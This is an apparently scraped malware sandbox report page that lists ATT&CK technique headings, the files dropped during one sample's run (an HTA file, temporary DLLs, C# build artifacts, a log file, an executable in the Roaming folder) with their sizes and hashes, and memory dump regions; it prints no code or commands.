Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DBFB4F662B3327D8A46CC42397A17A67

Filesize
345B

MD5
bb4eff5c9ad147e3bfa6f088e601333c

SHA1
f09cf1beea4138f524e17e3da763dfa923e7c5e9

SHA256
6c61f9f400dc4f3f18d5b4a29740d1bcd19a2aa2153da2951a57dc48f8c410ad

SHA512
d5530aee03bfd7acdf1b2222027ace09b01f47f2035c14b801c7805a7465dd7f49d92ff0aa4196428f0b3136f1299c46df6f2c5ba1176d70251d961f389e118f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
66207c0809f4f1f7fc6bd89f68907504

SHA1
8de32f0c583a50c94a4ed3a2bdad961b7caa0bcf

SHA256
522a2bdee9421fb6c084116190b87dcc52873e48600a50e12faf9ca337f23d38

SHA512
e324be6b313e39e52060cbf3a57d6094a3e6bfb25da89c4baa1922c03e60244c23bb77bd004f150c23fbfac0db1daf35610476582f6df8b038ea8f06ece00d15

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DBFB4F662B3327D8A46CC42397A17A67

Filesize
548B

MD5
91c6476c282ba69d911c8e5a15234521

SHA1
bdff07d77690e61bb7101b6dd876987607c5140d

SHA256
39f9a987e0d0ff45e227237b9a3c244e05523544f5fc9818364392f423d1a3ac

SHA512
f1a50b30af984a43d3c651c3af0f57d6d0ae58e2bff86cbb27f693492da2fb3d252f6d3d03e8c386ec5d8bb4b8bc63e295282bd162cb6abd8b77bd6be8237df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\FMnetwork[1].hta

Filesize
8KB

MD5
7c959a4affc47d937730dc9c396fc72c

SHA1
16ae0881f590b24f9ed0d64b232a4a6c04e8c497

SHA256
8f1ced17d7249385f7defacaea7a40e142532162a93b0a806085b0a488a75ff6

SHA512
8eb74c3632148e5080a86bb6ccf2a5a13ec5edb7b74370be68a16efae779911611f9429e23ec3e69374c7b3e76cb059dcf6f64ef65e00891366965b6c8871413

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE30F.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Log\logs.dat

Filesize
330B

MD5
a7f6f7cec5e0cb9de0ec82e4ffd4d413

SHA1
21d8c7d8bd4c26b6510338eba009fa2ed192c523

SHA256
c5b406690547ef068d7d79788e43daf64d3fc01a0a6745f42188de97dfa058ba

SHA512
50a6e7596ac17f120732c5be8edaf596018469252564594376b323d462d3b8951721c666964d6dcd4196c0d39804235f47257400225a811c4593e26de2f424ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEBA7.tmp

Filesize
1KB

MD5
a852e73e758d035b1597f8ba1c54b9b2

SHA1
77f81068f42334ad6cde73633d72220f4011c657

SHA256
678ef1a8b5bcf728a331796ded75d7eb7052039d842d480b5856e0f159d46ace

SHA512
4ca451ba6f0a9fa411cb5ac568b6912a1f8398043eaf949fdf2b405c438bba4ecf400c60e500728d8868590456acb29002cb551b796d3d5cb5d6db9a35eb2aa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\rqgaxc-9.dll

Filesize
3KB

MD5
6cb299cebec43a4c5289ea8cc9323f80

SHA1
b4218f4a98c862ae9a89062a9122e461594d74a0

SHA256
78c7b30b7d821b04f70f0d597dcb2d017df538f334f7c7d81c588cbbb60e4b32

SHA512
23804bbf8ea6b9b786ec3cc76c939d971e016f84652335993ccdc29f1eed9878d659ecfab18a70e0ca588d1bd002ec1b955c5c8920e08adc975ca329695884ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\rqgaxc-9.pdb

Filesize
7KB

MD5
d56347afb0081f52d727af624348cc13

SHA1
c8b47fdeee001ebf63a185c0a5b8023eb67900d9

SHA256
be14dbedf4139c01abb2782603fa64b4de3662d6a6eeeda41047cac859550de2

SHA512
ba9ab3cd19e8f8d3023af4074ca7fb03acec297988edb7e0ec8ce2100e5dcf7b643eaa2cf606161c804e0e1e00b2938ff2eeb2610010b74d2b65f91c8d5cd9ac

Download Submit
C:\Users\Admin\AppData\Roaming\jhl_service.exe

Filesize
3.5MB

MD5
2e5655f2cfebe6357e6388e678f3c073

SHA1
f1d6b68d73a8da906368837c1cde74a26a900858

SHA256
3c74031a1ddcfbff9691d2992ecd540eb82c4b781bda9ffc5125d40ec712589d

SHA512
13477f0bc9a73809e7b069dc441c7fb0023178811f4fe3f39ccbc4b4c412516b612439d8025b0c79c33201c791b343cdcf7dec4a3fe7eabcd3e28b1cf520747f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEBA6.tmp

Filesize
652B

MD5
c208d1e438b8a62f4a5cc6692cad09f0

SHA1
fb25fe5685e2f4a3ae0b23a12e67e7a1579402d3

SHA256
52c5f8b17e84deb247a81a1848f7142e4734c685292f44b800c401b1cec699aa

SHA512
0948baba5b163274ee78f9aef980f10fe46e650a1ac7ae327841096cd3d1697deaebeb6c0384315f1e0eda335dbb8af2ce2146ce7b307b36faa8f46e0ba6eda0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rqgaxc-9.0.cs

Filesize
470B

MD5
a7d91e40bc8462dd21ffa32a88e9ac58

SHA1
ebe5e871f66c1cd16eee15877121c26df1c543b5

SHA256
d8e1f45e7f43c2bf3ab22a0de1df58a8163cfda639a1c942e17f0ec65aacd389

SHA512
60e15e58c29c33ff64c853e904081b42d509da70b67e67d7f9f9ee8dd1e3cb2a59d038b7942ee03798d2d8527c46e16f674a1647257b912ab60ba6d981e17d68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rqgaxc-9.cmdline

Filesize
309B

MD5
aae2f6c159e319dcd22af131f7079424

SHA1
6de321fcafcb1744c2031144abba839fe37342a2

SHA256
24338bbf50cd3cd3afa8688cc4fae66a48cf90473c09055f7ef6562f707c1cb0

SHA512
8b5979d29f52a4a04369601deac3e58db6c21e8497dfd5ec9c251178654172bb88b973c59c367e1ba70f32fd193b38e06b25cc85b6078a2fe0dbcf621b23068d

Download Submit
\Users\Admin\AppData\Local\Temp\57613b55.dll

Filesize
8KB

MD5
e1db733e43aa8d065fb7e8669db76524

SHA1
3f9c62ee28959959271632fdc7f5387d539a1d23

SHA256
9e65d9e8ebb895f3b03c95ce64f044c70251fff444a4bcbee83f558b599a614d

SHA512
3f6106f32932e72d197865f7b796eba072c8ab20c22b4d205f27de9b9fc6c139be8450ae25541fbdac37a06bc3ec2d1fab3f9b3216201a9231b70fcde6fb8eb3

Download Submit
memory/988-99-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1128-91-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1128-90-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/1664-61-0x0000000006AF0000-0x0000000007452000-memory.dmp

Filesize
9.4MB

Download
memory/1908-71-0x0000000000130000-0x0000000000A92000-memory.dmp

Filesize
9.4MB

Download
memory/1908-86-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-75-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-62-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-80-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-79-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-76-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-81-0x0000000000130000-0x0000000000A92000-memory.dmp

Filesize
9.4MB

Download
memory/1908-82-0x0000000000130000-0x0000000000A92000-memory.dmp

Filesize
9.4MB

Download
memory/1908-84-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-83-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-144-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-85-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-88-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/1908-143-0x0000000010000000-0x000000001007F000-memory.dmp

Filesize
508KB

Download
memory/2296-17-0x0000000002E50000-0x0000000002E52000-memory.dmp

Filesize
8KB

Download
memory/2296-51-0x0000000072B3D000-0x0000000072B48000-memory.dmp

Filesize
44KB

Download
memory/2296-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2296-1-0x0000000072B3D000-0x0000000072B48000-memory.dmp

Filesize
44KB

Download
memory/2592-95-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2688-130-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download
memory/2904-16-0x0000000001EB0000-0x0000000001EB2000-memory.dmp

Filesize
8KB

Download
memory/2968-160-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

Filesize
4KB

Download